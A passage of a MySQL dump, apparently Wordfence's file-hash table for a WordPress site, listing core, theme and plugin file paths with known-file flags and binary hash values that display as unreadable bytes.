[�@./i�i��q��0�o','',0,'?'),('d��:w���O�І','wp-includes/ID3/getid3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!N\0�[�5�իk@0','B�#����L�fW������>2�nT����','',0,'?'),('dv�?���=#b�','wp-includes/wp-includes/ms-network.php',0,'����x�����3.�','����x�����3.�','ʸ]ST���ySo$�Vgv�\"-j!QGK���','',0,'?'),('d��1�쵓-�;O��','wp-admin/js/custom-background.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L-Ф�%��l�r�e�','�����ė�\"ٿjz�r�?:j\'��������','',0,'?'),('d>�������g 1J','wp-content/themes/advance/inc/kirki/assets/js/controls/editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0K��lF*\r��n�χ4','�n��D�zK~���#�<6�������QD','',0,'?'),('dF=���j��Hc�����','wp-content/plugins/akismet/wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]x�\"�Y�����KJ','\Z�Ia�^���iJ��H�:�j�:���b��','',0,'?'),('dN_��ЩS��\0ɠ','wp-content/themes/maxbusiness/images/slide2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"M\n�J(���Q','��B��S_�DTi�,��P�Z����r��,i�ű','',0,'?'),('dO*����weS�t�=','wp-includes/wp-includes/class-wp-walker.php',0,'z�+@,�G,��S^�y�','z�+@,�G,��S^�y�','�(8j�C[-��1�Ơ��ʖ��l3Om�','',0,'?'),('daM<M�=�[,&Y��7O','wp-includes/wp-includes/date.php',0,'n[*(Ҿ�w.m�y�z�','n[*(Ҿ�w.m�y�z�','�.��\0�qB_]������\0��a�}��\0�','',0,'?'),('d�ڐ��ż�&!��<m�','wp-content/themes/gambit/sidebar-main.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƹ���v�������','�����S2?�Z8����e���qz�J�@�VUe\"','',0,'?'),('d��*�X3̓��^��5','wp-content/themes/spidermag/assets/library/owlcarousel/js/owl.carousel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���k�G�a�`��;�N','g�u<�G��b)�H���n}��]�����xE����','',0,'?'),('d�k�JQAw6im<B1','wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x\rc�c�l��?ɴծ','9� ÂM�\0KR���&���#+�vCf��','',0,'?'),('d���Auh��041�','wp-includes/blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[\"����#�\'','j��$��)�~ŗH�x���}J�1z�м�v��','',0,'?'),('d�j\0K\Z.��t�z�cx','wp-content/themes/advance/inc/kirki/assets/images/1c.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʦ�e3�U�k�$','�ː)��͑`�Pb��L����E��C���','',0,'?'),('d��@�]� +L�s��','wp-content/themes/promote/css/welcome-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(쯫U��z�U���','F=�/�9��Ӏ�a��M�`� �$B6c8 �','',0,'?'),('d�0�ٷ\Z�����Ԍn','wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<3�8xuFR�ĖȦ�E','n��?Q��bz ��٢�)��S*��,Z�','',0,'?'),('d�3�G��O�2ik�@','wp-content/themes/storeone/css/animate.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eX�Ul�_5^��','==L����[��Ӧ�-�J�ZWGGs��Q�VN��;','',0,'?'),('d�(��%J��@�G�','wp-admin/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�N���ﭪ=j\0��','�jG�AV�sF�����j�+�-)�D����','',0,'?'),('d�S��&<;�}ӄ�#','wp-content/themes/advance/inc/kirki/assets/css/customizer-dynamic-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d��9�#=D�-��','p�� aк^�\\F}�dL0�m�dҌ��v^;m�','',0,'?'),('d�hħ{q4�2�K\"�','wp-includes/SimplePie/Rating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jkB�-\r?Q3Qw�U7','{nH�(>}Q(����a�����b�>��\n�FY+','',0,'?'),('d�4�j�2U�V��$�P','wp-admin/css/wp-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7#Q�&M?»��|�[','Q�D���6���hP���qqM9�F�O��\\O�','',0,'?'),('d�@!��d�J���','wp-includes/js/mediaelement/mejs-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('e\0���h�L���щ��','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I��H��%���Y','���V��/r:s�/�S��l�\"#��:�3�','',0,'?'),('e��e{��:\0�vy','wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�84|�]��h�֤�','����Aݻ�F�d�s`����0$$�{^����=�','',0,'?'),('e\r��Zf���ޞ��|�','wp-includes/js/api-request.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k#�(�ĩ����','\\���Q�M�`�$�ڣg�E�\0|�Pne�r]','',0,'?'),('e���Xnj.\\�(&�d','wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�رm:h�\rGZ�ڋY','t8uU��U��SĒ�qf����S�3i���i�u','',0,'?'),('e�P�f��o!�J�%','wp-content/plugins/wp-cerber/assets/flags/yt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��FE=�W��=�\'���','-�*U�� �K-:��햴�O��ա�3','',0,'?'),('e\"�WJ�[���<{nP','wp-content/themes/showcase-lite/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',����]贙9��','jC��ڿ�ZӖ�k�ւ���a�GTs��q��H','',0,'?'),('e#��Q�����\'��$','wp-content/themes/advance/inc/kirki/includes/panels/class-kirki-panels-default-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2h3B�뿳R�?','�o�xSY���sg�`Ȅ� \"��r6Z��V, C�','',0,'?'),('e$�Ou��o������l','wp-content/themes/auberge/assets/css/starter.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qަ=e�\Z\'.^���?','@`�?�\'�d�w���5y�6MG�\0����h�p@','',0,'?'),('e&�\'�O.�ж�\n?��','wp-content/themes/maxbusiness/js/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I�yfM|��P۵/','�|�>*i٢2\'E��|��Gj��$KpUJ�ʘ','',0,'?'),('e.PȴNB�Sx[�&��','wp-admin/includes/class-wp-plugin-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' :\'D<��*T;�G�','W 3\n�\'@G8y��;�FwTD���Zv�X�}��','',0,'?'),('e.���w��w�E','wp-includes/wp-includes/images/wlw/wp-comments.png',0,'L�6]P����.s���','L�6]P����.s���','�zl\Z��C��D���#�a�N��3\'XZ�','',0,'?'),('e/�f��D` TJk�','wp-content/themes/newsmag/assets/vendors/bootstrap/bootstrap.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','νs��Ku�z�','*4�R�Տk�\n6 �r2�BǬP9���1�-*','',0,'?'),('eKl[��L�xf`\0Asi�','wp-content/themes/promote/inc/kirki/includes/panels/class-kirki-panels-default-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z����?\\���sH�(\Z','�o�xSY���sg�`Ȅ� \"��r6Z��V, C�','',0,'?'),('ef��V9�Q��i�^\'','wp-content/themes/anima/resources/images/headers/glasses.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Lg�%](�{�Hy�','��ٓ҃�棩��4{���T���M�ĝH<bV','',0,'?'),('ef�<�ؐ0аV�K-o','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more.png',0,'����\n�\nm\0;�˫�z','����\n�\nm\0;�˫�z','$��v��o^���U� �A\0���:�\\C�u��','',0,'?'),('ei��y��,:���T�)','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�Q�#2Џ���R���','~G)�R���7i-�#��R 9H��ǫ� b','',0,'?'),('ek���MA�\Z9�G���','wp-content/themes/newsmag/inc/components/lazyload/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('eo�P�+�ϚMh��8�','wp-content/themes/advance/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�xIL����띧��R','�M�x��d��*˨��0G/�����A�^�','',0,'?'),('ep\r}�u_4������','wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����`X�c�b7�qNS�','�M���G�] �?u��gP�p1�,�(�V�^���','',0,'?'),('euo���(���8?5','wp-includes/js/jquery/ui/menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('evrӸ>G��kD��/�','wp-includes/wp-includes/js/dist/block-editor.js',0,'L������k�H1��v','L������k�H1��v','���F��%w+7����k �%���W��1Z�`!p','',0,'?'),('ex���R`���W��eG','wp-includes/wp-includes/js/wplink.js',0,'�7\"U��\"�?���','�7\"U��\"�?���','S\\�� ���ٺ�\'?��I��75�{','',0,'?'),('e}0wTnv_�g�~','wp-content/plugins/wordfence/views/scanner/options-group-basic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VE�gO�`#jV�4�C|','�s�c�� ;���*r3$X����G8ͬRK�','',0,'?'),('e��G�����W�+S�','wp-includes/wp-includes/css/dist/editor/editor-styles-rtl.css',0,'#YR\nP��>�y�L�,','#YR\nP��>�y�L�,','�4�A�&E(6��~�e�|vH��l�;���R�','',0,'?'),('e��lsUO|�R}ܝ�i','wp-includes/sodium_compat/src/Crypto32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I\r}j�NJQX]m��','ɱ��䱃Fn����2c.n�M��ڣ� A���','',0,'?'),('e��__�%��x���','wp-includes/class-snoopy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�PQ��I��P4!��','�+� ��uzR�W QW�|��5��� j[;U|�','',0,'?'),('e��\"�[� ���J�ے','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/data/gfonts.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�W1]��Y�ۢ�;�','���1ӖA�Rޖ��l��Ԅ]��$��9�;V�','',0,'?'),('e�^#|ۍ�TЩ��z','wp-includes/Text/Diff/Engine/xdiff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('eǛ�^�8l_*\\��','wp-content/themes/advance/inc/kirki/assets/js/controls/switch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\'?���6� Q���6','��X=+�>dS����fPu�h�s����}:L�','',0,'?'),('eއ��D�z\r\Z\n���)','wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�b*�\0dH��d.','Wq$!MW^f�q]]��Y/�e��>�xW3�\"ѿ','',0,'?'),('e�VT��1^2��]��','wp-includes/wp-includes/class-walker-category-dropdown.php',0,'m��s�ny�ld�)��','m��s�ny�ld�)��','�ՠ���P)_�s�)v]��Չ\"����|�','',0,'?'),('f�d�Յs�2��#^�','wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.css',0,'��A�V�t�Fƣ���','��A�V�t�Fƣ���','�2�q{Y�*lX�[q�kd���}�Jp�����','',0,'?'),('fΜtW����O\\m$','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-preset-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,��\'-�R�4����',']��#�n��Neb�t.�O�>���i^���ӟ�','',0,'?'),('f\r�������r�A','wp-includes/wp-includes/js/dist/data.min.js',0,'~Vew����MBE��|�\\','~Vew����MBE��|�\\','|;\n%��A����@P��L���剟�Ib��','',0,'?'),('f(�ХW�T�3Mo','wp-content/themes/showcase-lite/css/animation.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5U���{>d�֙a��','EiU�\r�fcw,�ӎ$$�a�>y���w�J�','',0,'?'),('fj�{wT�o\nx&Z��T','wp-content/themes/capacious/assets/js/script.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��?k����s�','M���p}pܜ!��?��B������Ы�5\'���','',0,'?'),('fp������j�H�\'','wp-content/plugins/wordfence/views/blocking/blocking-status.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\'N��S.;\r��MT','���2�婢��Mz�֡�XX~��u*<�.v�~','',0,'?'),('f��{\n�,�v�>� E','wp-includes/wp-includes/css/dist/components/style.css',0,'!���{9���YV?\'7�','!���{9���YV?\'7�','���f�4qS�� \\���\'��~v���\Z�h�','',0,'?'),('f�u3\n�M\\�}6*0�','wp-includes/class-wp-customize-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-j�b�4k2�`�s@','s\'�=*�o�[�垙B����i1�c9C�8P3�.��','',0,'?'),('f���N�]h�hIGZ','wp-includes/wp-includes/theme-compat/comments.php',0,'��Ϫ�-�Y�D��s��','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('f�霰f؟|h��U�L','wp-admin/includes/ms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�2�r����qh^','��H��\'t�r�\\\\ovV�ߖ����RJVY��p','',0,'?'),('f���flp�j5Օ�','wp-content/themes/promote/page-notitle_full_width.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X^:�\'\n�����','�#NAx�N�.�٨ߕ��D���\05]����]','',0,'?'),('f�4�6l�~�|xlA�w','wp-content/themes/wp-barrister/library/js/modernizr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����~]�A�A{��o)�','h��ԙ�e�*���r=>�0����;�O�}�k+','',0,'?'),('f��ŭ�8��;�slV','wp-admin/js/privacy-tools.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Dղ�������5� ',':��s3]9��R�*�w��\n�+#f����ݕ','',0,'?'),('f���*pd ��\n^','wp-content/themes/twentytwentyone/template-parts/header/site-branding.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U3�\"�ӳY&tP�,','�v��nݰFP/���q ��[yG\0�M��','',0,'?'),('f����B�D�Fr\r\r�','wp-includes/Requests/Transport/fsockopen.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�r�����QHˆV','Xi���c�R�)R�Ǡ�.�#`jjŏ�3?','',0,'?'),('f��1̜��#rT�g-�','wp-includes/wp-includes/js/dist/warning.js',0,'�Kn����/���=�','�Kn����/���=�','�v�Q�m����� �S-��#Qf��7�l3h}|','',0,'?'),('f�-�$��G2J�d�','wp-content/themes/twentynineteen/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�����/h�f\0W�','�ir���FT��n �Τ�~�NpE��Z�����z','',0,'?'),('f����e��R�)�','wp-includes/SimplePie/Item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-ߟ�� �8����1�V','��Q`�m{�Ҹ\n�ք=��R#�Q����\0K�','',0,'?'),('f�3��Y����T','wp-includes/js/jquery/ui/tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�73�l��c�P���R','��{�fT�k��3Ub�� AxT�8?�чaݯ�','',0,'?'),('fֈ�����V�Թ)�9','wp-includes/theme-compat/embed-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m\'牉�TeD�]pCA','J�ϑ߷�`�š+,��jr�#eQ�䫖 ���','',0,'?'),('fؕ�si\"�l�r-�^','wp-content/themes/weblog/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d}MTۡ�9��Eᾍ�','��e&�Z4X$�� \0�B� 5�;����u͛��|Q','',0,'?'),('f둤s#%<XRX�@>�','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*x�&B���!�$fW','�.�7^V�t�Y��U�@Ď�\'~(�:>�k�','',0,'?'),('g�%ͧ?r��Mc�','wp-content/themes/capacious/assets/css/global.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�t��6+�c�ٻ�=','a`ɇ�:�$�w���������\'���\r�uQ���','',0,'?'),('g\n��[�q��g- i�','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-ip-address.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?��O�߄_�D���','�`�YABO��k[���Ai�\"5\rg���','',0,'?'),('g,�\nX`?�7^V','wp-content/themes/storeone/images/shop-slide3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wg�gFKV�;���?��',']@N��g�!���cɦJ��W�Fr��l��','',0,'?'),('g�c�����ſ�4^','wp-includes/wp-includes/js/dist/rich-text.js',0,'y$�Bx!�u���w','y$�Bx!�u���w','��(��/�,gw�&tS��O}���E|�ʂ�','',0,'?'),('g���j\Zr�։�`\Z�*','wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.min.js',0,'�OAZ�n�\0��?!*�W�','�OAZ�n�\0��?!*�W�','q�{2�fX�����JgXC����c�Y�3��','',0,'?'),('g#��xz����0�ͱ','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-typography-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#Ժ&��M6S[\n\\=','!TȒ� (:-:+И�A�.�L�i2��Nۗ3C%','',0,'?'),('g#�,vM������:��','wp-includes/js/jquery/jquery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�o3�HH��䤱�&','�A���A�H�i�:�B�7����t��OFA','',0,'?'),('g+yr���q����D��/','wp-includes/vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Zm���f1q��˴','�nl\Z���h�1he�-�M��5�Nl��bd�Hpz�','',0,'?'),('g+���wJoG���{b','wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�2ң��A�!�V0I','�\"CG9^��ȷ�1��a�?�a�uk`','',0,'?'),('g6��UhA\0�C���b','wp-content/themes/anima/admin/images/2cSr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Pop�c�(]�yi&��','Cʆ�����;�����zp�\Z�0R&�n�yj','',0,'?'),('g=�C<4��b�6�-��','wp-content/themes/weblog/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U5�v_�4Ń^','�d�L֝��u��Q��#:�W�\r.Ӓ�4�','',0,'?'),('gC1N(�q;3�)h','wp-content/plugins/wp-cerber/assets/flags/ez.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('gE\n���X�F)4\0y�\'','wp-content/plugins/wp-cerber/assets/flags/gt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eQ�2�\Z>���^�','�\ndJj7ؖ�S��y�a�{���Sm�Բ','',0,'?'),('gQir��똿��/!��','wp-includes/rest-api/endpoints/class-wp-rest-search-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V�A�ݲ�1 \"�Q�','J� �%�D��_su4vs��NB=�c��','',0,'?'),('gf�Ys��g�u^�','wp-content/themes/advance/css/welcome-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<hA6uPy�Rƞ����','�[��&���/ �F��*���2^�߫����','',0,'?'),('gx�̢���6���A�\"','wp-content/themes/advance/inc/kirki/includes/sections/class-kirki-sections-hover-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ow���[�~r]��%','zŠ�]|�t�K��)�������be��rC>D�\n','',0,'?'),('g|y_�o4\"��X�N���','wp-includes/images/smilies/mrgreen.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-5��^����J�j���','���M��g�$��+;��\0�5����H&\\E6%w','',0,'?'),('g��i�v\Z0�X�A�','wp-content/themes/advance/inc/kirki/includes/scripts/class-kirki-scripts-loading.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"��_�[T������','��P�(�Y`���A�[b�v�z>з3w\n','',0,'?'),('g�\Z���Ş��|q�(','wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R�<�nI�<','�e}]T��Y(�u&\r��90+��a�DϮ�#��','',0,'?'),('g�$G\\��;�r���1X','wp-includes/images/wpicons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dS��uq��V_���a�','���cZ_��?n�_��K��6��1�\\}r','',0,'?'),('g�@�m����S�؍','wp-content/themes/spidermag/assets/css/responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�K!c��G�y�Xc�','�&\"$�.��6� ];\"|�T9�p�\Z�/@�\0cv�','',0,'?'),('g�9Q���h��-��J','wp-content/themes/hueman/functions/czr/tmpl/modules/widgets-areas-module-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���3��@\"����','�U:��f��~HX���n��\'F�(�\05�','',0,'?'),('g�f�1�۶�y�;�_','wp-includes/class-wp-http-proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@U,�:��-<I�e��','U���缕�H�.c�Sd~�*��)�','',0,'?'),('g�s��)��m��%','wp-content/plugins/wordfence/views/waf/options-group-whitelisted.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`r�ll�3@ޠ!s','F+�RZς�eQ$ep�G%Ev�-�xE','',0,'?'),('g�]e��!^��(PK���','wp-content/plugins/wordfence/models/common/wfTab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�T�}�HW\'<}\\','Z¥|�s�S�8e��3�Eؗ�$����ܜ-h�','',0,'?'),('g��(�!�{�o��LE�a','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-custom-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�sIo�Op��M2��','�콲�o��5�~F뷘�\Z���Q�K,R��(','',0,'?'),('g��~)�~�s�ʞ��I','wp-admin/includes/class-language-pack-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6d�,�����8E�','�G�y��mT�8=�?�5� �5��y�.�','',0,'?'),('g�Q��t�b=>O�u','wp-content/themes/Kent/FT/colors.php',0,'|݄���Q���','|݄���Q���','SU��C��ZL҆A�;)�J���\'�','',0,'?'),('g�?���>�Z�Y�T�Gi','wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php',0,'���:�Z{���5�o','���:�Z{���5�o','���<�s�6��\0, Ra�uhX��c���','',0,'?'),('g��]bR%� Z��E�','wp-includes/js/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ad�\'w#6?��w�','�����Q� 9I��o��T-�79_!���`','',0,'?'),('g�Ed��1��D}����','wp-includes/js/jquery/ui/autocomplete.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�s(.=����ͪ�','�a�b��u�7���K\'2��V��=y��','',0,'?'),('hy��J+�C�Cj�I7','wp-content/themes/promote/inc/kirki/assets/js/controls/checkbox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��I���n���kz�','_��\'`���tQ?_��`N�\0C���p�X��','',0,'?'),('h�fiI�fI%8��*/P','wp-content/themes/maxbusiness/js/wow.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h��*�e��\0�@9�','�\ry� ���\\��l��5����T�*��>Y','',0,'?'),('h\n�z�N:�cg�','wp-includes/block-patterns/two-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���8$�6��v','u���]��$)� ���w���5h1#}��8t�\Z','',0,'?'),('hZ[���=���w�r�','wp-includes/sodium_compat/src/Core32/XSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\������:R/�+','�ɫ�������:���jN�mm����R���[','',0,'?'),('h\ZOhl��_��Lm/�','wp-includes/class-wp-customize-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-@�{�p\r���9�u','O�PZ�y�s��6��z��r�4�QN�k��','',0,'?'),('h d��껅2��_�r','wp-includes/functions.wp-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�GQ\0���[��� �9','E�Z�H����Ruj�X{L��oy�X` Y��鈨','',0,'?'),('h0X-�i����^�G`8','wp-includes/pluggable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�pq�����EyJ�$��','�Y�Y\0+IBNvk�dE&��Bp����F�','',0,'?'),('h4���#3�`�-݈�\"�','wp-admin/profile.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0��,���g;ꙴ','�C��q��N,�`v�S��*���Z[�`���m�','',0,'?'),('h5���R�{uut�M�1','wp-content/themes/capacious/assets/js/smooth-scroll.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E������- u��','ԗ.��O��3���\r��qB|S��8R��9','',0,'?'),('h@Z�%�R�F�;ti\\m','wp-admin/css/login-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A��u�\n�xv6�','��Vk�\n&B����S2�w@��UG�ƺ����?�','',0,'?'),('hB��\0�_���O�GPX','wp-content/themes/showcase-lite/no-results.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�r�CH.p�Μ��Թ','J��)�����w�y_ޣ�iI$$wsk�{�p�','',0,'?'),('hW���b�.A�(&�','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�_���wW�?O','�*b]E�&�JαŠ�\\��4\0b1�>.w!�','',0,'?'),('hh}�T��N�zh�','wp-content/themes/promote/inc/kirki/assets/scss/controls/typography.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����� ;�����x','.��zF2�V�^W�,#g�!t���t���g8�','',0,'?'),('hkсLC,��S���yUg','wp-content/themes/Kent/js/jquery.flexslider.js',0,'K���:\"W#R��b�','K���:\"W#R��b�','Ñv\nq�o�\r�1�l��!�4d[�%o�x���','',0,'?'),('h|hE��f:Ʊ2��~','wp-admin/network/theme-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','堷ȹ����H^r�','�f�kL��\Z�)h/F_��M�9�j���V�','',0,'?'),('h���!|�c+�sF�#NW','wp-includes/wp-includes/js/jquery/ui/effect-fold.js',0,'��}:h�B�կ}z�x�','��}:h�B�կ}z�x�','�����n�\r�S�/<���b���ե]Na�','',0,'?'),('h�a�#U�|-N�($c�','wp-content/themes/hueman/option-tree/includes/ot-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\/~�cP\\�Ua','P�yW�£ _� w��T�}{��\0s�3n(\'','',0,'?'),('h�ch�IK���g���','wp-content/themes/cactus/template-parts/page/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��kH�4�3���)�','��ŧ%��ľm$�����Ǟ/)e;=)��!��jg','',0,'?'),('h��~cTOo�y4|','wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f\"����#6${ JL\'\"','�eŇ�6\Z(�q�&�ڶ���]���\n�Cli�ީ�','',0,'?'),('h�<�]���OpNCƴ�','wp-content/plugins/wordfence/lib/wordfenceURLHoover.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w���Z�\\��;�O�','�|�.h��.��+\r 